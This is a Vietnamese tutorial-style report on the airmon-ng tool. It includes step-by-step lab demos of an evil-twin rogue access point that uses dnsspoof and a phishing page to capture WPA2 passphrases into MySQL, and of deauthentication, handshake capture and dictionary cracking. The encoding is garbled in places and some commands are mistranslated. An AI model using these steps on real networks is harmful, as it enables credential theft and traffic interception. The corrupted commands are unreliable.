Công cụ Airmon-ng trong kali linux
LỜI MỞ ĐẦU
Công nghệ không dây ngày càng trở nên phổ biến vì nó cho phép bạn dễ dàng truy cập
Internet từ tất cả các địa điểm trên khắp thế giới mà không cần cáp mạng. Nhưng mạng
không dây không phải lúc nào cũng an tồn nếu bạn khơng hiểu những nguy hiểm của nó,
và đặc biệt là nếu khơng thực hiện các biện pháp phòng ngừa.
Trong xã hội ngày nay, chúng ta thấy ngày càng nhiều người dùng bị xâm phạm, đặc biệt
là ở các địa điểm Wi-Fi công cộng. Có thể có mạng khơng dây mở, mã hóa yếu hoặc chỉ
có vấn đề tin cậy đơn thuần.
2
Chương 1. Khái quát về Airmon-ng
1.1.
GIỚI THIỆU
airmon-ng - Tập lệnh POSIX sh được thiết kế để chuyển thẻ không dây sang chế độ giám
sát.
Tóm tắt
airmon-ng <start | stop> <interface> [channel] airmon-ng <check> [kill]
Sự mơ tả
Tiện ích Airmon-ng là một cơng cụ dòng lệnh được sử dụng để bật chế độ giám sát trên
các giao diện khơng dây. Nó cũng có thể được sử dụng để chuyển lại từ Chế độ giám sát
sang Chế độ được quản lý. Tuy nhiên, công cụ này khơng có sẵn dưới dạng tiện ích độc
lập. Nó đi kèm với gói Aircrack-ng . Trước tiên, hãy thảo luận về hai thuật ngữ này: Chế
độ giám sát và Chế độ được quản lý trước khi đi sâu hơn vào cài đặt và làm việc với
Airmon-ng.
1.1 Sự khác biệt giữa Chế độ giám sát và Chế độ được quản lý
Trong Chế độ được quản lý , thẻ giao diện khơng dây của bạn sẽ chỉ bắt các gói có địa
chỉ đích là địa chỉ MAC của PC của bạn. Do đó, nếu bạn được kết nối với mạng WiFi có
SSID "Wifi-2", giao diện khơng dây sẽ chỉ bắt các gói được hướng đến PC của bạn. Nó
sẽ thả bất kỳ gói nào được gửi bởi bất kỳ thiết bị nào khác trên mạng. Chế độ được
Ở chế độ Màn hình , giao diện khơng dây có thể nghe và bắt bất kỳ gói nào trong phạm
vi của nó. Khi chúng tơi nói gói, chúng tơi đề cập đến bất kỳ dữ liệu nào được gửi bởi
một thiết bị đến Điểm truy cập (ví dụ: bộ định tuyến) hoặc bất kỳ dữ liệu nào được truyền
từ Điểm truy cập đến các thiết bị trên mạng. Chế độ giám sát là cần thiết cho bất kỳ
người kiểm tra thâm nhập nào muốn thực hiện các cuộc tấn công không dây của chúng
tơi trên mạng. Nó cho phép một người nắm bắt nhiều gói tin có thể được sử dụng để bẻ
khóa mật khẩu WPA / WPA2 WIFI , thực hiện các cuộc tấn cơng MiTM và hơn thế nữa.
1.2.
Gói Aircrack-ng
Hiện tại, có nhiều cơng cụ bảo mật khác nhau để đánh giá an ninh mạng WiFi, nhưng gói
Aircrack-ng đã thu hút được khá nhiều tiếng tăm từ người dùng. Gói Aircrack-ng là một
bộ công cụ khác nhau được sử dụng để thao tác, bẻ khóa và đánh giá mạng WiFi để tìm
bất kỳ lỗ hổng hoặc lỗ hổng bảo mật nào. Nó tập trung vào bốn lĩnh vực chính của bảo
mật mạng không dây:
3
Kiểm tra thẻ giao diện: Tính năng này cho phép bạn kiểm tra khả năng của thẻ
để thực hiện chụp gói và chèn gói.
Giám sát: Điều này đề cập đến việc nắm bắt các gói và lưu trữ chúng trong một
tệp để phân tích thêm bằng cách sử dụng các công cụ của bên thứ ba như
WireShark
Tấn công không dây: Bao gồm tấn công hủy xác thực, tấn công phát lại, tạo điểm
truy cập giả mạo và nhiều hơn nữa bằng cách đưa gói tin vào.
Bẻ khóa mật khẩu: Bẻ khóa mật khẩu cho WEP, WPA, WPA2 và WPA PSK.
Gói Aircrack-ng bao gồm tối đa 16 công cụ để thực hiện tất cả các chức năng này. Một số
phổ biến nhất bao gồm, Airmon-ng, Airodump-ng, Aircrack-ng, Aireplay-ng, và nhiều
hơn nữa.
Các thơng số tùy chọn
start <interface> [channel]
Bật chế độ màn hình trên giao diện (và chỉ định kênh). Lưu ý: Madwifi-ng là một trường
hợp đặc biệt, 'start' phải được sử dụng trên giao diện wifi và 'dừng' trên giao diện thể
thao.
stop <interface>
Tắt chế độ giám sát và quay lại chế độ được quản lý (ngoại trừ madwifi-ng nơi nó giết
VAP thể thao).
check [kill]
Liệt kê tất cả các chương trình có thể ảnh hưởng đến thẻ không dây. Nếu 'kill' được chỉ
định, nó sẽ cố gắng giết tất cả chúng.
--verbose
Cờ này phải đặt trước start / stop / check và có thể được kết hợp với các tham số khác
hoặc được sử dụng một mình. Cờ này sẽ tăng tính chi tiết để cung cấp thêm thơng tin hữu
ích có thể khơng cần thiết cho hoạt động bình thường.
--debug
Cờ này phải đặt trước start / stop / check và có thể được kết hợp với các tham số khác
hoặc được sử dụng một mình. Cờ này sẽ tăng mức độ chi tiết đến mức gỡ lỗi để hỗ trợ
khắc phục các lỗi trong airmon-ng. Sử dụng cờ này khi mở lỗi, nhưng chỉ sử dụng -verbose khi yêu cầu hỗ trợ trong irc.
--elite
4
CẢNH BÁO: KHÔNG SỬ DỤNG: Cờ này phải đặt trước khi bắt đầu hoặc dừng và sẽ
ngăn airmon-ng gỡ bỏ các giao diện. CẢNH BÁO: Việc sử dụng cờ này sẽ ngay lập tức
bị loại khi nhận được bất kỳ sự hỗ trợ nào từ đội aircrack-ng, do hành vi này được biết là
đã bị phá vỡ. CẢNH BÁO!
1.3.
Lịch sử hình thành
Vào tháng 4 năm 2007, một nhóm nghiên cứu tại Đại học Công nghệ Darmstadt ở Đức
đã phát triển một phương pháp tấn công mới dựa trên một bài báo phát hành về mật mã
RC4 của Adi Shamir . Cuộc tấn cơng mới này, có tên là 'PTW', làm giảm số lượng vectơ
khởi tạo hoặc IV cần thiết để giải mã khóa WEP và đã được đưa vào bộ aircrack-ng kể từ
bản phát hành 0.9.
Aircrack-ng là một ngã ba của dự án Aircrack ban đầu. Nó có thể được tìm thấy như một
cơng cụ được cài đặt sẵn trong nhiều bản phân phối Linux như Kali Linux hoặc Parrot ,
có chung các thuộc tính khi chúng được phát triển trong cùng một dự án (Debian).
5
Chương 2. Hướng dẫn cài đặt, hướng dẫn sử dụng
2.1.
Phương pháp-1: Cài đặt Aircrack-ng Suite
Theo mặc định, gói Aircrack-ng được cài đặt sẵn trên bản cài đặt Kali Linux đầy đủ tính
năng. Tuy nhiên, điều đó có thể khơng xảy ra nếu bạn đã cài đặt phiên bản tối thiểu hoặc
cài đặt Kali Linux trên Chromebook hoặc Android. Nếu đó là trường hợp của bạn, hãy
làm theo các bước dưới đây.
Bước 1: Cài đặt Aircrack-ng
khởi chạy Terminal và thực hiện các lệnh bên dưới.
VD:
Khi hoàn tất, hãy chạy lệnh bên dưới để xác nhận cài đặt thành cơng. Điều đó hiển thị số
lượng CPU và hỗ trợ SIMD trên hệ thống của bạn.
VD:
Bước 2: Kiểm tra cài đặt Airmon-ng
Nếu Aircarck-ng được cài đặt thành công trên hệ thống của bạn, thì tiện ích Airmon-ng sẽ
có sẵn để sử dụng. Chạy lệnh Airmon-ng bên dưới để liệt kê tất cả các giao diện không
6
dây có sẵn trên hệ thống của bạn cũng như các trình điều khiển và chipset tương đương
của chúng.
VD:
Từ hình ảnh trên, chúng ta có thể xác nhận rằng Airmon-ng đã được cài đặt thành công
trên hệ thống của chúng tơi.
2.2.
Cài đặt Aircrack-ng Suite [Phương pháp 2]
Ngồi ra, bạn có thể cài đặt bộ Aircrack-ng bằng cách biên dịch mã nguồn trên Github và
tự biên dịch. Tất nhiên, phương pháp này hơi phức tạp và tốn thời gian hơn so với việc
cài đặt bộ Aircrack-ng với trình quản lý gói APT. Tuy nhiên, nếu bạn thích chạy các lệnh
khác nhau trên Terminal và muốn hiểu cách thức hoạt động của quá trình biên dịch, bạn
nên thử phương pháp này. Làm theo các bước dưới đây.
Bước 1: Cài đặt các phụ thuộc bắt buộc
Đầu tiên, khởi chạy Terminal và chạy các lệnh bên dưới để cài đặt các thư viện và phụ
thuộc cần thiết.
sudo apt install autoconf automake libpcre3-dev libnl-3-dev libsqlite3-dev libssl-dev
ethtool build-essential g ++ libnl-genl-3-dev libgcrypt20-dev libtool python3-distutils
sudo apt install -y pkg-config
VD:
7
Bước 2: Tải xuống mã nguồn
Khi tải xuống, hãy chạy lệnh bên dưới để tải xuống nguồn từ GitHub.
git clone />VD:
Khi bạn chạy ls lệnh, bạn sẽ thấy một thư mục mới, "aircrack-ng." Sử dụng cd lệnh để
điều hướng đến thư mục mới này.
cd aircrack-ng
Bước 3: Biên dịch và cài đặt Aircarck-ng
Bây giờ, hãy chạy các lệnh bên dưới (lần lượt theo thứ tự) để biên dịch mã nguồn và cài
đặt Aircarck-ng trên hệ thống của bạn.
Bước 4: Cập nhật Cơ sở dữ liệu OUI
Sau khi cài đặt aircrack-ng, hãy chạy lệnh bên dưới để cài đặt cơ sở dữ liệu OUI. Thao
tác này tải xuống danh sách OUI từ IEEE, cho phép tiện ích Airodump-ng thêm tên nhà
sản xuất khi tạo tệp NetXML.
sudo airodump-ng-oui-update
VD:
Sử dụng Airmon-ng để bật Chế độ giám sát
8
Để bắt đầu, trước tiên chúng ta cần biết tên của các giao diện khơng dây có sẵn trên hệ
thống của chúng ta. Chạy lệnh dưới đây.
ip link
VD:
Từ hình trên, bạn có thể thấy chúng ta có hai giao diện không dây - wlan0 và wlan1. Hãy
đặt wlan0 thành chế độ giám sát bằng cách chạy lệnh dưới đây.
sudo airmon-ng start wlan0
Để xác nhận xem chế độ giám sát đã được bật thành công trên giao diện của chúng tôi
hay chưa, hãy chạy lệnh bên dưới.
sudo iwconfig
VD:
Từ hình trên, bạn có thể thấy chế độ được đặt thành chế độ giám sát. Ngồi ra, tên của
giao diện của chúng tơi đã thay đổi từ wlan0 thành wlan0mon. Giờ đây, chúng tơi có thể
9
sử dụng thẻ này để dị tìm gói và thực hiện bất kỳ thử nghiệm bảo mật mạng không dây
nào khác. Để dừng chế độ màn hình trên thẻ này, hãy chạy lệnh bên dưới.
sudo airmon-ng stop wlan0mon
10
2 Chương 3. Bài lab, kịch bản demo
3.1. Demo 1: Evil twin attack Với DNSMASQ - Bẻ Khóa WPA2PSK Khơng Dây
Bạn đã bao giờ nghe nói về một evil twin AP chưa?
Một evil twin AP giống như một điểm truy cập giả mạo. Kẻ tấn công tạo ra một AP
không dây giả để dụ người dùng nghĩ rằng đó là một mạng khơng dây đáng tin
cậy. Chúng khuếch đại tín hiệu theo cách mà khách hàng sẽ tự động kết nối với chúng vì
các đèn hiệu nhanh hơn và có phạm vi gần hơn. Các công cụ như Honeypot, CqureAP,
D-Link G200, HermesAP, Rogue Squadron và WifiBSD có thể thực hiện các cuộc tấn
công này.
Evil twin AP là một điểm truy cập trông và hoạt động giống như một AP hợp pháp và lôi
kéo người dùng cuối kết nối với điểm truy cập của chúng tơi. Bộ aircrack-ng của chúng
tơi có một cơng cụ, airbase-ng , có thể được sử dụng để chuyển đổi bộ điều hợp không
dây của chúng tôi thành một điểm truy cập. Đây là một cuộc tấn cơng từ phía máy khách
mạnh mẽ sẽ cho phép chúng tôi xem tất cả lưu lượng truy cập từ máy khách, thực hiện
một cuộc tấn công trung gian và thậm chí có thể bẻ khóa khóa mạng khơng dây.
Trong xã hội ngày nay, chúng ta thấy ngày càng nhiều người dùng bị xâm phạm, đặc biệt
là ở các địa điểm Wi-Fi cơng cộng. Có thể có mạng khơng dây mở, mã hóa yếu hoặc chỉ
có vấn đề tin cậy đơn thuần. Nhưng trước khi chúng ta bắt đầu, có thể bạn sẽ cần một số
thiết bị thích hợp để theo dõi phần trình diễn của Evil Twin Attack:
Phần cứng được sử dụng
Windows 10 (Máy cơ sở) - Với Kết nối Ethernet
Kali Linux 2018.1 (Máy ảo) - Đã bật Chế độ NAT
Bộ chuyển đổi TP-LINK không dây USB - 150 MBPS
Công cụ yêu cầu
VMWare Workstation 14
Hệ điều hành Kali Linux 2018.1
Airmon-ng, Airodump-ng, Airbase-ng và Aireplay-ng
dnsmasq
iptables
11
Apache và MySQL
Bước 1 - Cài đặt gói dnsmasq trực tiếp bằng cách gõ “ apt-get install dnsmasq -y ”.
Dnsmasq cung cấp cơ sở hạ tầng mạng cho các mạng nhỏ: DNS, DHCP, quảng cáo bộ
định tuyến và khởi động mạng. Nó được thiết kế để nhẹ và có diện tích nhỏ, phù hợp với
các bộ định tuyến và tường lửa hạn chế tài nguyên.
Nó cũng đã được sử dụng rộng rãi để chia sẻ kết nối trên điện thoại thông minh và các
điểm truy cập di động, và để hỗ trợ mạng ảo trong các khn khổ ảo hóa. Các nền tảng
được hỗ trợ bao gồm Linux (với glibc và uclibc), Android, * BSD và Mac OS X.
Dnsmasq được bao gồm trong hầu hết các bản phân phối Linux và hệ thống cổng của
FreeBSD, OpenBSD và NetBSD.
Nếu gói dnsmasq đã được cài đặt trong máy của bạn, thì bạn có thể bỏ qua bước này.
Bước 2 - Tạo tệp cấu hình cho dnsmasq với sự trợ giúp của trình chỉnh sửa gedit (Trình
chỉnh sửa đồ họa u thích của chúng tơi) và thêm mã sau vào nó như được hiển thị bên
dưới:
Command: sudo gedit /root/Desktop/dnsmasq.conf
Mã số:
interface
dhcp-range
dhcp-option
dhcp-option
server
log-queries
log-dhcp
nghe-address = 127.0 .0.1
=
=
=
=
=
at0
10.0.0.10,10.0.0.250,12h
3,10.0.0,1
6,10.0.0.1
8.8.8.8
12
Bước 3 - Trước khi bật chế độ giám sát, hãy đảm bảo rằng airmon-ng và
NetworkManager của bạn không xung đột với nhau, nếu khơng, bạn cần phải giết trình
quản lý mạng hoặc lặp lại tồn bộ q trình.
Mở tệp cấu hình của trình quản lý mạng và đặt địa chỉ MAC của thiết bị bạn muốn trình
quản lý mạng ngừng quản lý:
Command: gedit /etc/NetworkManager/NetworkManager.conf
Bây giờ thêm phần sau vào cuối tệp:
[keyfile]
unmanaged-devices: mac = AA: BB: CC: DD: EE: FF, A2: B2: C2: D2: E2: F2
NetworkManager.conf là một tệp cấu hình cho NetworkManager. Nó được sử dụng để
thiết lập các khía cạnh khác nhau của hành vi NetworkManager. Vị trí của tệp có thể
được thay đổi thơng qua việc sử dụng đối số “ –config = ” cho NetworkManager.
Bước 4 - Kết nối Bộ điều hợp không dây USB của bạn và xác nhận nó với sự trợ giúp
của lệnh iwconfig .
Ở đây bạn có thể thấy một giao diện mới có tên là wlan0 (Nó có thể khác với bạn).
Trong trường hợp này, chúng ta đang sử dụng Bộ điều hợp USB TP-LINK nhưng bạn có
thể sử dụng bất kỳ bộ điều hợp không dây nào như Alfa Card, D-Link, Netgear, v.v.
13
Với lệnh “ ifconfig wlan0 up ” sẽ đưa giao diện không dây của bạn lên
Bước 5 - Đặt thẻ của bạn vào chế độ giám sát bằng cách gõ “ airmon-ng start wlan0 ”
Một giao diện mới sẽ được tạo ( trong trường hợp của chúng tôi là wlan0mon ), là tên
giao diện bạn sẽ cần sử dụng trong các ứng dụng khác.
Bước 6 - Đã đến lúc bắt đầu giám sát tất cả các gói AIR với sự trợ giúp của lệnh sau:
Command: airodump-ng wlan0mon
Airodump-ng được sử dụng để bắt gói các khung 802.11 thơ và đặc biệt thích hợp để thu
thập WEP IV (Vectơ khởi tạo) cho mục đích sử dụng chúng với aircrack-ng.
Những thứ chúng ta cần từ đầu ra lệnh trên là:
Mục tiêu BSSID - 84: 10: 0D: 9E: A1: CD
Kênh mục tiêu - 7
ESSID mục tiêu - Yeahhub
14
Trong đó, BSSID là địa chỉ MAC của điểm truy cập và ESSID là tên của mạng không
dây được gọi là SSID có thể để trống nếu SSID ở chế độ ẩn.
Bước 7 - Nếu chúng ta làm đúng mọi thứ, chúng ta có thể nhân bản AP của anh ta và
khiến anh ta kết nối với cặp song sinh xấu xa của chúng ta. Khi anh ấy làm điều đó,
chúng tơi sẽ có thể xem tất cả lưu lượng truy cập của anh ấy, cũng như có khả năng chèn
các gói / tin nhắn / mã của chúng tơi vào máy tính của anh ấy.
Để tạo một AP giả mạo với airbase-ng, hãy nhập lệnh sau vào thiết bị đầu cuối mới:
Command: airbase-ng -e “Yeahhub” -c 7 wlan0mon
Airbase-ng là một cơng cụ đa mục đích nhằm tấn cơng khách hàng chứ khơng phải chính
Điểm truy cập (AP). Vì nó rất linh hoạt và linh hoạt, tóm lại nó là một thách thức.
Một giao diện chạm mới tại 0 sẽ được tạo, hoạt động như “mặt có dây” đối với AP. Để sử
dụng AP, giao diện mới này phải chạy với ifconfig và cần có IP.
MAC được gán sẽ tự động được đặt thành BSSID [theo mặc định là MAC của giao diện
không dây]. Sau khi một IP được chỉ định và máy khách sử dụng IP tĩnh ngoài cùng một
mạng con, sẽ có một kết nối Ethernet hoạt động giữa AP và máy khách. Bất kỳ daemon
nào cũng có thể được gán cho giao diện đó, ví dụ như máy chủ dhcp và dns.
15
Cùng với kernel ip_nticing và một quy tắc có thể thay đổi thích hợp để giả mạo, AP hoạt
động như một bộ định tuyến không dây.
Bước 8 - Để at0 cấp phát địa chỉ IP, trước tiên chúng ta cần gán một dải IP cho chính nó.
Command: ifconfig at0 10.0.0.1 up
Bây giờ chúng tôi sẽ sử dụng giao diện Internet mặc định của chúng tôi, eth0, để định
tuyến tất cả lưu lượng truy cập từ máy khách qua nó. Nói cách khác, cho phép nạn nhân
truy cập internet và cho phép chúng ta (kẻ tấn công) đánh hơi lưu lượng truy cập đó.
Đối với điều đó, chúng tơi sẽ sử dụng tiện ích iptables để thiết lập quy tắc tường lửa để
định tuyến tất cả lưu lượng thông qua at0 độc quyền.
Command: iptables
–flush
Command: iptables –table nat –append POSTROUTING –out-interface eth0 -j
MASQUERADE
Command: iptables –append FORWARD –in-interface at0 -j CHẤP NHẬN
Theo mặc định, bất kỳ bản phân phối Linux hiện đại nào sẽ bị tắt Chuyển tiếp IP. Đây
thường là một ý tưởng hay, vì hầu hết mọi người sẽ khơng cần Chuyển tiếp IP, nhưng nếu
chúng ta đang thiết lập bộ định tuyến / cổng Linux hoặc có thể là máy chủ VPN (pptp
hoặc ipsec) hoặc chỉ là một máy chủ quay số đơn giản thì chúng ta sẽ cần cho phép
chuyển tiếp.
Nhập “1” vào tệp ip_osystem sẽ yêu cầu hệ thống bật các quy tắc được xác định trong
IPtables và bắt đầu chuyển tiếp lưu lượng truy cập (nếu có).
Command: echo 1> / proc / sys / net / ipv4 / ip_osystem
Bước 9 - Cuộc tấn công Evil Twin của chúng tôi hiện đã sẵn sàng và các quy tắc đã
được kích hoạt, bây giờ chúng ta sẽ khởi động máy chủ dhcp để cho phép AP giả mạo
phân bổ địa chỉ IP cho các máy khách.
Khởi động trình nghe DHCPD với sự trợ giúp của công cụ dnsmasq bằng cách gõ lệnh
sau:
Command: dnsmasq -C /root/Desktop/dnsmasq.conf -d
16
Nếu nó hiển thị một số loại lỗi liên quan đến "dnsmasq: không thể tạo ổ cắm lắng nghe
cho cổng 53: Địa chỉ đã được sử dụng" như hình dưới đây:
au đó, bạn cần tìm số ID quy trình và hủy tất cả các quy trình liên quan đến ID quy trình
đó.
Command: netstat
Command: sudo
Command: sudo kill 1975
-anlp
ps
| grep
-f
-w
-p
LISTEN
1975
Sau khi kết thúc q trình, hãy lặp lại lệnh tương tự. Nó sẽ hoạt động ngay bây giờ!
Bước 10 - Bước tiếp theo là khởi động Dịch vụ Apache và MySQL bằng cách nhập các
lệnh sau:
Command: /etc/init.d/apache2
Command: /etc/init.d/mysql start
start
Bước 11 - Chúng tôi đã thiết lập vectơ tấn công Evil Twin của mình và hoạt động hồn
hảo. Bây giờ chúng ta cần thiết lập trang web giả mạo của mình để nạn nhân có thể nhìn
thấy trang trong khi duyệt và nhập cụm mật khẩu mà anh ta / cô ta sử dụng cho điểm truy
cập của mình.
Để thực hiện việc này, vui lòng tải xuống tệp zip sau với sự trợ giúp của lệnh wget trong
thư mục / var / www / html.
Command: cd
/
var
/
www
/
html
Command: wget />
17
Bước 12 - Bây giờ giải nén tệp Yeahhub-ap.zip đã tải xuống ở trên bằng cách gõ:
Command: unzip Yeahhub-ap.zip
Lệnh trên sẽ trích xuất nội dung của tệp Yeahhub-ap.zip và sao chép chúng vào thư mục
html của Apache để khi nạn nhân mở trình duyệt, họ sẽ tự động được chuyển hướng
đến trang web index.html mặc định .
Bước 13 - Bây giờ để lưu trữ thông tin xác thực được nhập bởi nạn nhân trong trang
html, chúng ta cần một cơ sở dữ liệu SQL.
Bạn sẽ thấy một tệp dbconnect.php cho điều đó, nhưng để có hiệu lực, bạn cần một cơ
sở dữ liệu đã được tạo sẵn để dbconnect.php sẽ phản ánh những thay đổi trong DB.
Mở thiết bị đầu cuối và nhập: mysql -u root –p
Bước 14 - Tạo fakeap người dùng mới và mật khẩu fakeap bằng cách gõ lệnh sau:
Command: create user fakeap@localhost identified by ‘fakeap’;
18
Bước 15 - Bây giờ tạo một cơ sở dữ liệu mới với tên rogue_AP bằng cách gõ:
Command: create database rogue_AP;
Và để sử dụng loại cơ sở dữ liệu “ use rogue_AP; ”
Bước 16 - Bước tiếp theo là tạo một bảng tên wpa_keys nơi tất cả các mật khẩu sẽ được
lưu bởi người dùng.
Command: create table wpa_keys(password1 varchar(32), password2 varchar(32))
Bước 17 - Tiếp theo, cấp tất cả các quyền cho người dùng fakeap.
Command: grant all privileges on rogue_AP.* to ‘fakeap’@’localhost’;
Bước 18 - Thoát khỏi MySQL và kết nối với người dùng fakeap ngay bây giờ bằng cách
nhập:
Command: mysql -u fakeap –p
Mật khẩu ở đây cũng là fakeap
Bước 19 - Chọn cơ sở dữ liệu rogue_AP bằng cách gõ:
Command: sử dụng rogue_AP;
19
Và Chèn một mục nhập giả vào bảng wpa_keys chỉ để thử nghiệm:
Command: chèn vào các giá trị wpa_keys (password1, password2) (“testpass”,
“testpass”);
Và để xem nội dung của bảng wpa_keys, lệnh là:
Command: select * from wpa_keys;
Lưu ý rằng cả hai giá trị đều giống nhau ở đây, điều đó có nghĩa là mật khẩu và mật
khẩu xác nhận phải giống nhau.
Cuộc tấn công của chúng ta hiện đã sẵn sàng, chỉ cần đợi máy khách kết nối và xem
thông tin đăng nhập đến.
Trong một số trường hợp, khách hàng của bạn có thể đã được kết nối với AP gốc. Bạn
cần ngắt kết nối ứng dụng như chúng tôi đã làm trong các hướng dẫn trước bằng cách sử
dụng tiện ích aireplay-ng.
Bước 20 - Để hủy xác thực các máy khách đang hoạt động, lệnh là:
Command: aireplay-ng –deauth 0 -a <BSSID> wlan0mon
–Deauth 0 nghĩa là Yêu cầu hủy xác thực không giới hạn nhưng bạn cũng có thể giới hạn
yêu cầu bằng cách nhập số tự nhiên.
Ngay sau khi khách hàng kết nối với AP của bạn, bạn sẽ thấy một hoạt động trong cửa
sổ thiết bị đầu cuối của airbase-ng như sau:
20
Bước 21 - Bây giờ để mơ phỏng phía máy khách, chúng tôi đã kết nối fakeAP
( Yeahhub ) trên một máy tính xách tay chạy windows khác và sử dụng trình duyệt web
Firefox để minh họa cuộc tấn cơng.
Nạn nhân hiện có thể truy cập Internet. Bạn có thể làm 2 điều tại giai đoạn này:
Xác định lưu lượng truy cập của khách hàng
Chuyển hướng tất cả lưu lượng truy cập đến trang AP giả mạo - Và đó là những gì
chúng tơi muốn làm.
Để chuyển hướng khách hàng đến trang giả mạo của bạn, ở đây bạn cần chạy tiện ích
dnsspoof đã được cài đặt sẵn trong mọi Máy Kali Linux trên giao diện at0 được tạo bởi
lệnh airbase-ng:
Command: dnsspoof -i at0
Giả mạo DNS, còn được gọi là nhiễm độc bộ nhớ cache DNS, là một hình thức tấn cơng
bảo mật máy tính, trong đó dữ liệu Hệ thống tên miền bị hỏng được đưa vào bộ nhớ
cache của trình phân giải DNS, khiến máy chủ định danh trả về bản ghi kết quả khơng
chính xác, chẳng hạn như địa chỉ IP. Điều này dẫn đến lưu lượng truy cập được chuyển
hướng đến máy tính của kẻ tấn cơng (hoặc bất kỳ máy tính nào khác).
Bước 12 - Bây giờ quay lại máy của Nạn nhân và truy cập google.com và bạn sẽ thấy
rằng, trang web google.com đang hiển thị trang web giả mạo của bạn mà bạn đã lưu trữ
trong máy Kali Linux của mình, điều này yêu cầu nạn nhân nhập mật khẩu để tải xuống
và nâng cấp phần sụn.
21
Ở đây, chúng tôi đang nhập “ yeahhub @ 123 ” làm mật khẩu mà chúng tôi (Nạn nhân)
nghĩ là mật khẩu AP của anh ấy / cô ấy.
Ngay sau khi nạn nhân nhấn [ENTER], bạn có thể thấy màn hình bên dưới với kiểu tải
trang.
Bây giờ trở lại phe tấn công. Bạn cần kiểm tra trong cơ sở dữ liệu MySQL để biết mật
khẩu được lưu trữ.
Chỉ cần gõ lệnh đã sử dụng trước đó trong cửa sổ MySQL terminal và xem có bản cập
nhật mới hay khơng.
22
Bạn đã thu thập thành công cụm mật khẩu WPA2, ngay từ nạn nhân, ở dạng văn bản
thuần túy.
3.2. Demo 2: Bẻ khóa WPA2-PSK Với Aircrack - Phương
Pháp Tấn Cơng Từ Điển
Bước đầu tiên là kết nối bộ điều hợp không dây USB của bạn với Máy ảo Kali Linux, bạn
có thể dễ dàng xác nhận / kiểm tra nó bằng cách nhập “ iwconfig ” vào thiết bị đầu cuối
của mình.
Như bạn có thể thấy đầu ra của “ iwconfig ”, một giao diện không dây hiện đang hiển thị
có tên là “ wlan0 ”, điều đó có nghĩa là bộ điều hợp không dây USB của bạn đã được gắn
và hoạt động.
Bây giờ, bước tiếp theo là đặt giao diện không dây của bạn vào chế độ giám sát để nó có
thể bắt / đưa các gói tin vào.
Để bắt đầu, chỉ cần nhập “ airmon-ng start wlan0 ” trong cùng một thiết bị đầu cuối của
bạn.
Bây giờ bạn có thể thấy rằng, một chế độ giám sát đã được bật trên cùng một thẻ không
dây với tên mới “ wlan0mon ” mà chúng ta sẽ sử dụng thêm để quét và khai thác.
Bây giờ gõ “ airodump-ng wlan0mon ” để xem tất cả các mạng gần thiết bị / thẻ của
bạn với tất cả thông tin tốt nhất có thể mà chúng tơi u cầu như BSSID, Channel No,
Enc Type, ESSID (tên mạng không dây), v.v.
23
Ở đây trong màn hình bên dưới, chúng ta sẽ đi với mạng đầu tiên có Tên là “ Chetan
Soni ” và BSSID của họ là “ C4: F0: 81: A1: 0C: 99 ” và Kênh số 9 với loại Mã hóa là
WPA2-PSK.
BSSID (Mã định danh nhóm dịch vụ cơ sở) khơng là gì ngồi địa chỉ mac của thiết bị của
bạn.
Bây giờ, bước tiếp theo là nắm bắt các gói với sự trợ giúp của gói Airodump-ng được cài
đặt sẵn một lần nữa trong máy Kali Linux của bạn.
Để nắm bắt bắt tay 4 chiều vì WPA / WPA2 sử dụng bắt tay 4 chiều để xác thực thiết bị
với mạng. Bạn không cần phải biết bất cứ điều gì về điều đó có nghĩa là gì, nhưng bạn
phải nắm bắt được một trong những cái bắt tay này để bẻ khóa mật khẩu mạng.
Những cái bắt tay này xảy ra bất cứ khi nào một thiết bị kết nối với mạng, chẳng hạn như
khi hàng xóm của bạn đi làm về.
Để bắt tay 4 chiều, chỉ cần nhập lệnh dưới đây vào terminal mới của bạn.
airodump-ng -c <Channel No> –bssid <Mac Address> -w <File name> wlan0mon
Trong trường hợp của chúng tôi, Kênh số là 9 và BSSID là “ C4: F0: 81: A1: 0C:
99 ” và tên tệp để thu các gói là “ yeahhub ”.
Bạn sẽ thấy kết quả tương tự như màn hình bên dưới. Bây giờ ở đây bạn có thể thấy ở
góc trên bên phải của màn hình bên dưới, khơng có bắt tay, vì vậy để nhận được giá trị
bắt tay ngay lập tức, cách tốt nhất là gửi tín hiệu hủy xác thực của mạng không dây wrt
đến trạm để người dùng sẽ tự động kết nối lại.
24
Đối với Deauthentication, chúng tơi sẽ sử dụng gói Aireplay-ng mà bạn có thể dễ dàng
tìm thấy trên máy Kali Linux của mình và lệnh để gửi các gói deauth là:
aireplay-ng -0 2 -a <ID BSSID> -c <ID trạm> wlan0mon
Ở đây -a là viết tắt của địa chỉ BSSID của đích, -c là viết tắt của địa chỉ trạm và -0 là
khơng. của gói tin deauth.
Khi bạn đã bắt được bắt tay, hãy nhấn CTRL + C để thoát khỏi airodump-ng . Bạn sẽ
thấy tệp .cap ở bất kỳ nơi nào bạn đã yêu cầu airodump-ng lưu ảnh chụp (rất có thể
là yeahhub-01.cap ).
Chúng ta sẽ sử dụng tệp chụp này để bẻ khóa mật khẩu mạng.
Như chúng ta đã thảo luận về rất nhiều cách để bẻ khóa mạng không dây WPA2PSK nhưng bây giờ chúng ta sẽ sử dụng một phương pháp từ điển brute force đơn giản
với sự trợ giúp của gói Aircrack-ng, một trong những cơng cụ bẻ khóa mạng khơng dây
phổ biến nhất.
Để Crack với Aircrack-ng, hãy gõ
aircrack-ng -a2 -b <BSSID> -w <Wordlist> Filename.cap
Ở đây, -a là chế độ tấn công của bạn, 1 là WEP và 2 là WPA / WPA2.
25